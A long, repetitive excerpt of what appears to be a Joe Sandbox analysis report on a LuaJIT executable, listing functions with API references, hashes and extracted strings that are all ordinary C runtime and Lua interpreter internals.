                                                                                                                                                                                                                              • Instruction ID: 2d0d9c6e658de9a71afc24b9d87c1460c65d5033b0b9c4c323aad6b88e0201b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51012132A386C282E720AB52F44436AB3B0FB84784F905035D69D07A59DFBCD408CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772459D50 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459D6B
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459D8A
                                                                                                                                                                                                                                • Part of subcall function 00007FF772459378: GetProcAddress.KERNEL32(?,?,00000002,00007FF772459856,?,?,?,00007FF77245AB66,?,?,?,00007FF77244AF01), ref: 00007FF7724594D0
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459DA9
                                                                                                                                                                                                                                • Part of subcall function 00007FF772459378: LoadLibraryW.KERNELBASE(?,?,00000002,00007FF772459856,?,?,?,00007FF77245AB66,?,?,?,00007FF77244AF01), ref: 00007FF77245941B
                                                                                                                                                                                                                                • Part of subcall function 00007FF772459378: GetLastError.KERNEL32(?,?,00000002,00007FF772459856,?,?,?,00007FF77245AB66,?,?,?,00007FF77244AF01), ref: 00007FF772459429
                                                                                                                                                                                                                                • Part of subcall function 00007FF772459378: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF772459856,?,?,?,00007FF77245AB66,?,?,?,00007FF77244AF01), ref: 00007FF77245946B
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459DC8
                                                                                                                                                                                                                                • Part of subcall function 00007FF772459378: FreeLibrary.KERNEL32(?,?,00000002,00007FF772459856,?,?,?,00007FF77245AB66,?,?,?,00007FF77244AF01), ref: 00007FF7724594A4
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459DE7
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459E06
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459E25
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459E44
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459E63
                                                                                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF772459E82
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                                                                              • API String ID: 3255926029-3252031757
                                                                                                                                                                                                                              • Opcode ID: 08f7e19246d0e55c8c0c643605134dc751b4da3462cbaba9e9df61be8aca2df6
                                                                                                                                                                                                                              • Instruction ID: d7adacf2bde8ab879dd3b26d5229f2b036bcf6e9a219d61b29625d49b740d4a9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08f7e19246d0e55c8c0c643605134dc751b4da3462cbaba9e9df61be8aca2df6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1317962E38647A1F625FB92EC505E4A321EB14764FC00533D53D172A19EFCAE49CFA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723C8590 Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 117COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcsxfrm$_free_nolock
                                                                                                                                                                                                                              • String ID: .\?.dll;!\?.dll;!\loadall.dll$.\?.lua;!\lua\?.lua;!\lua\?\init.lua;$LUA_CPATH$LUA_NOENV$LUA_PATH$\;?!-$_LOADED$_LOADLIB$_PRELOAD$__gc$config$cpath$loaded$loaders$package$path$preload
                                                                                                                                                                                                                              • API String ID: 338564694-1474762456
                                                                                                                                                                                                                              • Opcode ID: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                                                                                                                                                                                              • Instruction ID: ca4da1ee6e36dbc407e93a8d834f053689fcff1e171a6a2c7493994d1419e7ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E515062A3898286E610FB65E8515BAE360FBC0754F901136F9BD476A9CFFCD901CF60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772397CA0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 174COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wcsxfrm
                                                                                                                                                                                                                              • String ID: %s:$...$[builtin#%d]:$ at %p$ in function '%s'$ in function <%s:%d>$ in main chunk$%d:$%s$Snlf$stack traceback:
                                                                                                                                                                                                                              • API String ID: 1214967616-750625491
                                                                                                                                                                                                                              • Opcode ID: dad8c19f1df65b98f19272fbb915c4e626c507869c5506c0b5815d88a20289f3
                                                                                                                                                                                                                              • Instruction ID: 1a032a11a93dce749c7c0bf7e356477def58b9cf09a7697b138816ecec87780f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dad8c19f1df65b98f19272fbb915c4e626c507869c5506c0b5815d88a20289f3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A915C636286C285DA30DB15E0403BEB7A0F7C4B84F904576DAAD97BA8CEBCD444CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723C7E50 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 225COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free_nolockwcsftime
                                                                                                                                                                                                                              • String ID: day$hour$isdst$min$month$sec$wday$yday$year
                                                                                                                                                                                                                              • API String ID: 793903186-297742768
                                                                                                                                                                                                                              • Opcode ID: 2aaffe12b0db6b9518b4475245139ff0e0a880d6dad9045458ec8c24c5b8c61e
                                                                                                                                                                                                                              • Instruction ID: 8fe9a55a69fc06e918d7887e3c3983999b42774b6658e19fc5955e5069aef73d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2aaffe12b0db6b9518b4475245139ff0e0a880d6dad9045458ec8c24c5b8c61e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52C13D37628B8585DB20DB16E48036AB7A0F7C9B94F904136EA9D87BA9CF7CD440CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723AE5D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 52libraryloaderthreadCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                                                                                                                                                                                                                              • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                                                                                                                                                                                                                              • API String ID: 4260375681-184456188
                                                                                                                                                                                                                              • Opcode ID: cc04c540dfdcd993c93d582994d185e799fa4b9f9365148040414810b697b9ff
                                                                                                                                                                                                                              • Instruction ID: 3e28f5db4b9e685f9a81f7bdb43b42a38716fe82cabc063215a9f913b1dbfb7c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc04c540dfdcd993c93d582994d185e799fa4b9f9365148040414810b697b9ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9021CC37528B8582DB50EB1AE494369B370F785B44FA00136EB9D47768DFBED845CB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245215C Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 479COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2516539321
                                                                                                                                                                                                                              • Opcode ID: 2e035ac35fe9b102a8f7191a604ce257ebae7614de89db9076753e014526f37d
                                                                                                                                                                                                                              • Instruction ID: dde22b3df87ee8c2f526066d6c987162e1bf256e74d1ffad71f289da99843f34
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e035ac35fe9b102a8f7191a604ce257ebae7614de89db9076753e014526f37d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4125F23B3854287FB24EA17D054279A691EB51764FD44232EAF9866D4DBBCED80CF20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772430144 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                              • Opcode ID: 21daca37c64a951625de81c52c05d4c1e6152d44712894eceea29e405e421fc1
                                                                                                                                                                                                                              • Instruction ID: 80d19c270f08870aeaa23e6665987259cc7c0c6328e48e1351cd702537ec0858
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21daca37c64a951625de81c52c05d4c1e6152d44712894eceea29e405e421fc1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E1A373A3874186EB20EB26D4442ADB7A0FB45BD8F901235DE5D67B46CF78E981CB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77242F3FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF77242F6AE,?,?,?,00007FF77242F3A0,?,?,00000001,00007FF77242F135), ref: 00007FF77242F481
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF77242F6AE,?,?,?,00007FF77242F3A0,?,?,00000001,00007FF77242F135), ref: 00007FF77242F48F
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF77242F6AE,?,?,?,00007FF77242F3A0,?,?,00000001,00007FF77242F135), ref: 00007FF77242F4B9
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF77242F6AE,?,?,?,00007FF77242F3A0,?,?,00000001,00007FF77242F135), ref: 00007FF77242F4FF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF77242F6AE,?,?,?,00007FF77242F3A0,?,?,00000001,00007FF77242F135), ref: 00007FF77242F50B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: c3afe34d56b073810ade250f6c7973b9ef5f886303c28095954288b42dbd8d7d
                                                                                                                                                                                                                              • Instruction ID: 3dd9367d0c40000ccda60a5a271c45960a026b2701c1f07f33d30e7f89aca6a8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3afe34d56b073810ade250f6c7973b9ef5f886303c28095954288b42dbd8d7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE317322A3A64291EF25BB539400575A2D4FF08BA0FCA0635DD3D4A755DFBCE881CB20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77246F1B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                                                                                                                                                                                              • Instruction ID: dd7a9bf193a402b6304ffc9a6d7174e97a91a54ecae2a08bcbcc021fdd29b3c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72117223738A4186E750AB53A844729E3A0FB88BE4F954234D97E87798CFBCDC04CB54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772396760 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 386COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: =[C]$Lua$main
                                                                                                                                                                                                                              • API String ID: 0-2004024069
                                                                                                                                                                                                                              • Opcode ID: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
                                                                                                                                                                                                                              • Instruction ID: bc6e5b83a719ef1b937337c6ff1f367ec59a56c19319f45818c1e5369dab348f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1622D877629B8585DB70DB19E08036AB7A0F789B94F60412ADADD87BA8DF7CD440CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723AE430 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 62COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                              • String ID: C$I$J$N
                                                                                                                                                                                                                              • API String ID: 3168844106-327184588
                                                                                                                                                                                                                              • Opcode ID: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                                                                                                                                                                                              • Instruction ID: 977d8ba8a3fad173f81c8342046f21168ae517d5f583ed659976d39b68272ed4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D31DC7262D6818AD7A09B15E04422AFBB0F788B68F401279F69D47B98CBBCD545CF14
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244FCD0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
